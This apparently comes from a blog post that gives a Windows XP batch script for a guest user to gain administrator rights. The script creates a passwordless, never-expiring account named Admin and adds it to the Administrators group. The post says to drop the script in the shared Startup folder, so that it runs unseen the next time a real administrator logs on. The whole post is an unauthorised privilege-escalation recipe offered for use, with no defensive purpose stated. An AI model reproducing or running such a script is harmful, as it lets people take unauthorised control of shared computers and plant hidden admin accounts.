Subscribe to our RSS Feeds

Create a admin account if u r a Guest in XP

0 Comments »
Code:

@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.

Here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created
so next time you log on u can use
username:admin
password:no

0 Responses to "Create a admin account if u r a Guest in XP"

Post a Comment